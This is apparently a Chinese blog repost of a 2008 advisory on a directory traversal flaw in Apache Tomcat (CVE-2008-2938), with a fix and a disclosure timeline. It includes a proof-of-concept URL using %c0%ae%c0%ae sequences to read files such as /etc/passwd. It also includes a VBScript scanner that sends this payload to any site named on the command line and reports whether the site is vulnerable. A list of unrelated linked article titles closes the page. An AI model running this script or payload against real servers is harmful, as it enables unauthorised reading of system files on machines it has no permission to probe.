Apache Tomcat出了一个类似当年IIS url 编码的漏洞。漏洞发生在Apache Tomcat处理UTF-8编码时,没有正确转换,从而导致在处理包含%c0%ae%c0%ae的url时转换为类似../的形式,使得可以遍历系统任意文件,包括

/etc/passwd等

触发的条件为Apache Tomcat的配置文件context.xml 或 server.xml 的'allowLinking' 和 'URIencoding' 允许'UTF-8'选项

Title: Apache Tomcat Directory Traversal Vulnerability Author: Simon Ryeo(bar4mi (at) gmail.com, barami (at) ahnlab.com) Severity: High Impact: Remote File Disclosure Vulnerable Version: prior to 6.0.18 Solution: - Best Choice: Upgrade to 6.0.18 (http://tomcat.apache.org) - Hot fix: Disable allowLinking or do not set URIencoding to utf8 in order to avoid this vulnerability. - Tomcat 5.5.x and 4.1.x Users: The fix will be included in the next releases. Please apply the hot fix until next release. References: - http://tomcat.apache.org/security.html - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2938 History: - 07.17.2008: Initiate notify (To Apache Security Team) - 08.02.2008: Responsed this problem fixed and released new version - 08.05.2008: Notify disclosure (To Apache Tomcat Security Team) - 08.10.2008: Responsed with some suggestions. Description As Apache Security Team, this problem occurs because of JAVA side. If your context.xml or server.xml allows 'allowLinking'and 'URIencoding' as 'UTF-8', an attacker can obtain your important system files.(e.g. /etc/passwd) Exploit If your webroot directory has three depth(e.g /usr/local/wwwroot), An attacker can access arbitrary files as below. (Proof-of-concept) http://www.target.com/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/foo/bar # milw0rm.com [2008-08-11]

VBS 测试版:

Dim strUrl,strSite showB() Set Args = Wscript.Arguments If Args.Count <> 1 Then ShowU() Else strSite=Args(0) End If strUrl="/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/foo/bar" Set objXML = CreateObject("Microsoft.XMLHTTP") objXML.Open "GET",strSite & strUrl, False objXML.SetRequestHeader "Referer", strSite objXML.send() if objXML.status=200 then wscript.echo("存在漏洞") end if Sub showB() With Wscript .Echo("+--------------------------=====================------------------------------+") .Echo("Exploit Apache Tomcat UTF-8") .Echo("Code By Safe3") .Echo("+--------------------------=====================------------------------------+") End with End Sub Sub showU() With Wscript .Echo("+--------------------------=====================------------------------------+") .Echo("用法:") .Echo(" cscript "&.ScriptName&" site") .Echo("例子:") .Echo(" cscript "&.ScriptName&" http://www.example.com >result.txt") .Echo("+--------------------------=====================------------------------------+") .Quit End with End Sub

Apache Tomcat UTF-8编码漏洞[转载至邪恶八进制]相关推荐

  1. Apache Tomcat 曝文件包含漏洞:攻击者可利用该漏洞读取webapp目录下的任意文件...

    点击上方蓝色"程序猿DD",选择"设为星标" 回复"资源"获取独家整理的学习资料! 作者 | oschina 来源 | https://ww ...

  2. 【通告更新】Apache Tomcat服务器文件包含漏洞安全风险通告第三次更新

    近日,奇安信CERT监测到CNVD发布了漏洞公告,对应CNVD漏洞编号:CNVD-2020-10487.CVE漏洞编号:CVE-2020-1938.CNVD漏洞公告称Apache Tomcat服务器存 ...

  3. php x24 x65 x6d x61,Apache Tomcat/JBoss EJBInvokerServlet / JMXInvokerServlet 漏洞利用

    Apache Tomcat/JBoss EJBInvokerServlet / JMXInvokerServlet (RMI over HTTP) Marshalled Object RCE漏洞利用 ...

  4. Apache Tomcat AJP 文件包含漏洞(CVE-2020-1938)

    漏洞描述 产生原因 环境搭建 漏洞复现 漏洞描述 Java 是目前 Web 开发中最主流的编程语言,而 Tomcat 是当前最流行的 Java 中间件服务器之一,从初版发布到现在已经有二十多年历史,在 ...

  5. 在mac系统安装Apache Tomcat的详细步骤(转载自himi的博客,修改了错误添加了图片)

    对于Apache Tomcat 估计很多童鞋都会,那么今天就简单说下在mac上进行tomcat的安装:    第一步:下载Tomcat       这里Himi下载的tomcat version:7. ...

  6. Apache Tomcat 再爆严重安全漏洞

    Apache Tomcat 再次爆出安全漏洞: 漏洞:CVE-2011-3190  Apache Tomcat 绕过验证和信息泄露 严重性:严重 公布方:Apache软件基金会 受影响的版本: Tom ...

  7. tomcat ajp协议安全限制绕过漏洞_国家信息安全漏洞共享平台发布Apache Tomcat漏洞安全公告...

    2月22日消息 国家信息安全漏洞共享平台(CNVD)近日发布了一份关于 Apache Tomcat 存在文件包含漏洞的安全公告,具体如下: 安全公告编号:CNTA-2020-0004 2020 年 1 ...

  8. Apache Tomcat安全漏洞列表及整改建议合集

    描述: 安全整改目前已经成为安全运维工程师必备的技能之一,但是令人头疼的是,经常会应为一些整改问题,百度无数次,并且不知道标准是什么.下面就为大家总结了在近期web漏洞整改中,绿盟给出的漏洞报告及整改 ...

  9. Tomcat 又爆出高危漏洞!Tomcat 8.5~10 中招…

    作者 | 栈长 来源 | Java技术栈 开源界最近很热闹啊,各个主流软件或框架漏洞频发,比如像 Struts2.FastJSON.Dubbo.Redis.Tomcat 等都存在各种各样的漏洞. 不要 ...

最新文章

  1. UOJ #53.线段树区间修改
  2. 数组拷贝问题的解决方法
  3. mysql 查询表结构 几种方法
  4. 【Web安全】Weak Session IDs (弱会话IDs)-burp进行Cookie劫持
  5. Python爬虫之BeautifulSoup和requests的使用
  6. 软件架构师的工作职责
  7. python中的内部函数和闭包函数
  8. Linux CentOS 7 防火墙/端口设置
  9. Silverlight/Windows8/WPF/WP7/HTML5周学习导读(7月30日-8月5日)
  10. Android学习笔记:TabHost 和 FragmentTabHost
  11. 《大数据》2015年第3期“研究”——社交网络影响力传播研究(下)
  12. 【转】Windows7硬盘安装Linux
  13. Aspose.Words.dll根据模板生成word详解
  14. “每个人的商学院”系列丛书
  15. UVC 摄像头驱动开发
  16. U盘安装win8.1
  17. 世界最具影响力的100个品牌
  18. 金蝶采购模块采购赠品业务处理逻辑
  19. 某某文学网站小说爬虫
  20. 微信怎么建群?三种方法,总有一种适合你!

热门文章

  1. 使用vue插件实现全球地图,实现你环游世界的梦
  2. Java基础知识小练习合集
  3. 2022N1叉车司机考试题模拟考试题库及模拟考试
  4. java flowable_rxJava reactivex.Flowable使用
  5. Oracle PrimaveraUnifier 之数据要素(Data Element)
  6. 关于IE下复选框的样式问题
  7. 想要创业,注册公司需要什么流程和资料?
  8. 华为meit30有鸿蒙,有maet30pro和小主机m710q在快充路上的倔强
  9. 一个桌面弹幕软件,用来记单词刚刚好
  10. Excel嵌入网页(一)